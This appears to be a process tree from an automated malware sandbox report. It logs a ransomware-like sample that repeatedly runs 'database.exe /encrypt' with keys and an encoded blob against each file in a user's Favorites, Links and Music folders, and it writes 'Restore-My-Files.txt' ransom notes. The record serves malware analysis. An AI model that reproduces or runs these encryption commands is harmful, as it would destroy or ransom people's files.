                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4684
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSNBC News.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Get Windows Live.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Gallery.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6096
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Mail.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Windows Live\Windows Live Spaces.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Desktop.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\Downloads.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Links\RecentPlaces.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\DismountWatch.wmx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3128
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\EnterGet.vb.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\FindRestart.DVR.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\FormatLock.ps1.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Music\InstallCheckpoint.ttc.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
